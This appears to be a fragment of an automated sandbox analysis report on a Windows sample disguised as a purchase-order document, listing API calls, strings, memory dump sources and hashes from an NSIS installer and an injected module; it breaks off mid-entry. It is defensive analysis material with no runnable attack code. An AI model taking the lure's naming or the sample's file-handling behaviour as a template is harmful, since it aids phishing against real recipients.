                                                              • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                              • Instruction Fuzzy Hash: 5F611579D0031AAFEF15CBA4C840BDEB7BAAF05324F404096D646B7294DF789A46CF52

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: %m$~$Gon~$~F@7$~dra
                                                              • API String ID: 4218353326-230879103
                                                              • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                              • Instruction ID: 36909413264ed7fef23ac5c7600856747387e75df2f991c78a8b838327bf87c4
                                                              • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                              • Instruction Fuzzy Hash: BA7103B9D002296BDB119BB48884ADF7BFDAF09750F504096DA44E7241EE7CD789CBA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 788 405caa-405cd1 lstrcpyW 789 405cd3-405ceb call 405bf8 CloseHandle GetShortPathNameW 788->789 790 405cf9-405d08 GetShortPathNameW 788->790 791 405e20-405e25 789->791 797 405cf1-405cf3 789->797 790->791 792 405d0e-405d10 790->792 792->791 794 405d16-405d54 wsprintfA call 405fae call 405bf8 792->794 794->791 801 405d5a-405d76 GetFileSize GlobalAlloc 794->801 797->790 797->791 802 405e19-405e1a CloseHandle 801->802 803 405d7c-405d86 call 405c7b 801->803 802->791 803->802 806 405d8c-405d99 call 405b5d 803->806 809 405d9b-405dad lstrcpyA 806->809 810 405daf-405dc1 call 405b5d 806->810 811 405de4 809->811 815 405de0 810->815 816 405dc3-405dc9 810->816 814 405de6-405e13 call 405bb3 SetFilePointer WriteFile GlobalFree 811->814 814->802 815->811 818 405dd1-405dd3 816->818 820 405dd5-405dde 818->820 821 405dcb-405dd0 818->821 820->814 821->818
                                                              APIs
                                                              • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E4E,?,?,?,004059C6,?,00000000,000000F1,?), ref: 00405CBA
                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,?,00405E4E,?,?,?,004059C6,?,00000000,000000F1,?), ref: 00405CDE
                                                              • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CE7
                                                                • Part of subcall function 00405B5D: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B6D
                                                                • Part of subcall function 00405B5D: lstrlenA.KERNEL32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B9F
                                                              • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405D04
                                                              • wsprintfA.USER32 ref: 00405D22
                                                              • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D5D
                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D6C
                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405DA4
                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DFA
                                                              • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405E0C
                                                              • GlobalFree.KERNEL32(00000000), ref: 00405E13
                                                              • CloseHandle.KERNEL32(00000000), ref: 00405E1A
                                                                • Part of subcall function 00405BF8: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BFC
                                                                • Part of subcall function 00405BF8: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405C1E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                              • String ID: %ls=%ls$NUL$[Rename]
                                                              • API String ID: 1265525490-899692902
                                                              • Opcode ID: 4ec48ef19e877a87b4e550a8e1bcde9517342a2eb5b98d96a27769bbdfe06ad2
                                                              • Instruction ID: 278018eb507e55e18bba05fe136388c5c8d345875c3a2ef582da275f9efe5ed0
                                                              • Opcode Fuzzy Hash: 4ec48ef19e877a87b4e550a8e1bcde9517342a2eb5b98d96a27769bbdfe06ad2
                                                              • Instruction Fuzzy Hash: 4C410F71604B19BFD2206B61AC4DF6B3A6CDF45754F14053BB901F62C2EA38A9018ABD
                                                              APIs
                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                              • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                              • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                              • String ID: F
                                                              • API String ID: 941294808-1304234792
                                                              • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                              • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                              • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                              • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                              • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                              • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                              • lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 0040479C
                                                              • lstrcatW.KERNEL32(?,004271A0), ref: 004047A8
                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                                • Part of subcall function 0040574C: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040575F
                                                                • Part of subcall function 00406220: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,75573420,00403542), ref: 00406283
                                                                • Part of subcall function 00406220: CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                                • Part of subcall function 00406220: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,75573420,00403542), ref: 00406297
                                                                • Part of subcall function 00406220: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,75573420,00403542), ref: 004062AA
                                                              • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487C
                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404897
                                                                • Part of subcall function 004049F0: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A91
                                                                • Part of subcall function 004049F0: wsprintfW.USER32 ref: 00404A9A
                                                                • Part of subcall function 004049F0: SetDlgItemTextW.USER32(?,004226E8), ref: 00404AAD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: A$&B
                                                              • API String ID: 2624150263-2586977930
                                                              • Opcode ID: 6280fc6980825afd9ee0809b1ca6071d0e9f114e0af1474ec63fd39ca55c6531
                                                              • Instruction ID: 99b17f69f627c4fe70adaab035ba94d9a502da106e2b73a6a76b2d9e8e29038f
                                                              • Opcode Fuzzy Hash: 6280fc6980825afd9ee0809b1ca6071d0e9f114e0af1474ec63fd39ca55c6531
                                                              • Instruction Fuzzy Hash: ECA170B1A00209ABDB11AFA5DC85AAF77B8EF85714F10843BF601B62D1D77C89418F69
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 382A7D06
                                                                • Part of subcall function 382A90BA: _free.LIBCMT ref: 382A90D7
                                                                • Part of subcall function 382A90BA: _free.LIBCMT ref: 382A90E9
                                                                • Part of subcall function 382A90BA: _free.LIBCMT ref: 382A90FB
                                                                • Part of subcall function 382A90BA: _free.LIBCMT ref: 382A910D
                                                                • Part of subcall function 382A90BA: _free.LIBCMT ref: 382A911F
                                                                • Part of subcall function 382A90BA: _free.LIBCMT ref: 382A9131
                                                                • Part of subcall function 382A90BA: _free.LIBCMT ref: 382A9143
                                                                • Part of subcall function 382A90BA: _free.LIBCMT ref: 382A9155
                                                                • Part of subcall function 382A90BA: _free.LIBCMT ref: 382A9167
                                                                • Part of subcall function 382A90BA: _free.LIBCMT ref: 382A9179
                                                                • Part of subcall function 382A90BA: _free.LIBCMT ref: 382A918B
                                                                • Part of subcall function 382A90BA: _free.LIBCMT ref: 382A919D
                                                                • Part of subcall function 382A90BA: _free.LIBCMT ref: 382A91AF
                                                              • _free.LIBCMT ref: 382A7CFB
                                                                • Part of subcall function 382A571E: HeapFree.KERNEL32(00000000,00000000,?,382A924F,?,00000000,?,00000000,?,382A9276,?,00000007,?,?,382A7E5A,?), ref: 382A5734
                                                                • Part of subcall function 382A571E: GetLastError.KERNEL32(?,?,382A924F,?,00000000,?,00000000,?,382A9276,?,00000007,?,?,382A7E5A,?,?), ref: 382A5746
                                                              • _free.LIBCMT ref: 382A7D1D
                                                              • _free.LIBCMT ref: 382A7D32
                                                              • _free.LIBCMT ref: 382A7D3D
                                                              • _free.LIBCMT ref: 382A7D5F
                                                              • _free.LIBCMT ref: 382A7D72
                                                              • _free.LIBCMT ref: 382A7D80
                                                              • _free.LIBCMT ref: 382A7D8B
                                                              • _free.LIBCMT ref: 382A7DC3
                                                              • _free.LIBCMT ref: 382A7DCA
                                                              • _free.LIBCMT ref: 382A7DE7
                                                              • _free.LIBCMT ref: 382A7DFF
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID:
                                                              • API String ID: 161543041-0
                                                              • Opcode ID: 5f64dc951c6efea549c42e75ac61972ee676a6698936690349c2938c206b2247
                                                              • Instruction ID: b5b473325a6bb2e2bef023438532dc61a6231d8796c416705781c92c94219368
                                                              • Opcode Fuzzy Hash: 5f64dc951c6efea549c42e75ac61972ee676a6698936690349c2938c206b2247
                                                              • Instruction Fuzzy Hash: 3C319E79600B06EFEB218A79DE40B67BBE9FF00350F904469E889D7160DF38E884CB14
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00402DD0
                                                              • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                                • Part of subcall function 00405BF8: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BFC
                                                                • Part of subcall function 00405BF8: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405C1E
                                                              • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                              • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7C
                                                              Strings
                                                              • Error launching installer, xrefs: 00402E0C
                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                              • Null, xrefs: 00402EB5
                                                              • soft, xrefs: 00402EAC
                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                              • Inst, xrefs: 00402EA3
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                              • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                              • API String ID: 2803837635-787788815
                                                              • Opcode ID: d5a77cc6bee4d90e7eda19427a8a4cf0714f505a664e78c7155da71c5f6bc0b2
                                                              • Instruction ID: 4e3209b53bdebe8ba6f789b0e0a530dabd6f5a0a3926ba0fa2d0dbc3b843d87d
                                                              • Opcode Fuzzy Hash: d5a77cc6bee4d90e7eda19427a8a4cf0714f505a664e78c7155da71c5f6bc0b2
                                                              • Instruction Fuzzy Hash: 4D610631941205ABDB209FA4DD85B9E3BB8EB04354F20457BF604B72D2C7BC9E419BAD
                                                              APIs
                                                              • GetVersion.KERNEL32(00000000,004216C8,?,0040526B,004216C8,00000000,00000000,00000000), ref: 00406071
                                                              • GetSystemDirectoryW.KERNEL32(004271A0,00000400), ref: 004060EF
                                                              • GetWindowsDirectoryW.KERNEL32(004271A0,00000400), ref: 00406102
                                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040613E
                                                              • SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 0040614C
                                                              • CoTaskMemFree.OLE32(?), ref: 00406157
                                                              • lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617B
                                                              • lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,0040526B,004216C8,00000000,00000000,00000000), ref: 004061D5
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 004060BD
                                                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406175
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                              • API String ID: 900638850-730719616
                                                              • Opcode ID: e31b2ddd4529637651ef3c93dcef70bddb782fc6bb0b3b2f1a5ed02a94110898
                                                              • Instruction ID: 5cce0682863fafc60a16059ed1eb0c3d77be7ea2b31a2434558a531189329514
                                                              • Opcode Fuzzy Hash: e31b2ddd4529637651ef3c93dcef70bddb782fc6bb0b3b2f1a5ed02a94110898
                                                              • Instruction Fuzzy Hash: EA61D271A00115AADF209F25CC40AAF37A5EF54314F12813FE906BA2D1D73D99A2CB5E
                                                              APIs
                                                              • _free.LIBCMT ref: 382A59EA
                                                                • Part of subcall function 382A571E: HeapFree.KERNEL32(00000000,00000000,?,382A924F,?,00000000,?,00000000,?,382A9276,?,00000007,?,?,382A7E5A,?), ref: 382A5734
                                                                • Part of subcall function 382A571E: GetLastError.KERNEL32(?,?,382A924F,?,00000000,?,00000000,?,382A9276,?,00000007,?,?,382A7E5A,?,?), ref: 382A5746
                                                              • _free.LIBCMT ref: 382A59F6
                                                              • _free.LIBCMT ref: 382A5A01
                                                              • _free.LIBCMT ref: 382A5A0C
                                                              • _free.LIBCMT ref: 382A5A17
                                                              • _free.LIBCMT ref: 382A5A22
                                                              • _free.LIBCMT ref: 382A5A2D
                                                              • _free.LIBCMT ref: 382A5A38
                                                              • _free.LIBCMT ref: 382A5A43
                                                              • _free.LIBCMT ref: 382A5A51
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 61961e8df50a7cc8ab1dc1a76a412027a23db3bcf5eb34241a9ec302e387ac4c
                                                              • Instruction ID: a89d148e0ff2f6efd2f856080d1b2583c0e49ad4bad285ecfa7f539330955124
                                                              • Opcode Fuzzy Hash: 61961e8df50a7cc8ab1dc1a76a412027a23db3bcf5eb34241a9ec302e387ac4c
                                                              • Instruction Fuzzy Hash: 2D119F7A520148FFCB11DF94CE41C9A3FB9BF04350B8540A1BA089B239DA36EA549B80
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: DecodePointer
                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                              • API String ID: 3527080286-3064271455
                                                              • Opcode ID: 34d1b1cb3b83423012301c2b721ab359f0e3d477ca64df46742d78af41f5195d
                                                              • Instruction ID: e2fc886dab9102ea777eb71b96a1b6d3bc077df61648e593ad8ee0ad83db3bd0
                                                              • Opcode Fuzzy Hash: 34d1b1cb3b83423012301c2b721ab359f0e3d477ca64df46742d78af41f5195d
                                                              • Instruction Fuzzy Hash: 12518EB491064ACBEF01DFA8D64859CBFB6FF09350F624599D482B7254CF398A24CB14
                                                              APIs
                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 382A1D1B
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 382A1D37
                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 382A1D4B
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 382A1D58
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 382A1D72
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 382A1D7D
                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 382A1D8A
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                              • String ID:
                                                              • API String ID: 1454806937-0
                                                              • Opcode ID: a6f53756b386264d70236c6beb7f5650729c311e0a3868792d675e98a94b8b96
                                                              • Instruction ID: bea6998e6291c5a4df41ff052ec04a4c6c24eb151609268ff80161040236714e
                                                              • Opcode Fuzzy Hash: a6f53756b386264d70236c6beb7f5650729c311e0a3868792d675e98a94b8b96
                                                              • Instruction Fuzzy Hash: 2221F47594121CBFD7109BA08CCCFEBBAECEF08358F040569F615E2140DE789E868A74
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                              • GetSysColor.USER32(00000000), ref: 0040423A
                                                              • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                              • SetBkMode.GDI32(?,?), ref: 00404252
                                                              • GetSysColor.USER32(?), ref: 00404265
                                                              • SetBkColor.GDI32(?,?), ref: 00404275
                                                              • DeleteObject.GDI32(?), ref: 0040428F
                                                              • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                              • String ID:
                                                              • API String ID: 2320649405-0
                                                              • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                              • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                              • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                              • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,382A9C07,?,00000000,?,00000000,00000000), ref: 382A94D4
                                                              • __fassign.LIBCMT ref: 382A954F
                                                              • __fassign.LIBCMT ref: 382A956A
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 382A9590
                                                              • WriteFile.KERNEL32(?,?,00000000,382A9C07,00000000,?,?,?,?,?,?,?,?,?,382A9C07,?), ref: 382A95AF
                                                              • WriteFile.KERNEL32(?,?,?,382A9C07,00000000,?,?,?,?,?,?,?,?,?,382A9C07,?), ref: 382A95E8
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: dae50990e30bcbef60e554e143ae1d9e0c9fb207a07f3d66035ff2c5040b348d
                                                              • Instruction ID: 19a1c830f8c15b4c6f8f37431483dfe0019c0207499eb814cbccb0be4136980b
                                                              • Opcode Fuzzy Hash: dae50990e30bcbef60e554e143ae1d9e0c9fb207a07f3d66035ff2c5040b348d
                                                              • Instruction Fuzzy Hash: 0851A2B5D00209AFDB00CFAAC895ADEBBF9EF09700F14415AE565E7281DB74E941CB60
                                                              APIs
                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402616
                                                              • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402639
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040264F
                                                                • Part of subcall function 00405C7B: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C8F
                                                                • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
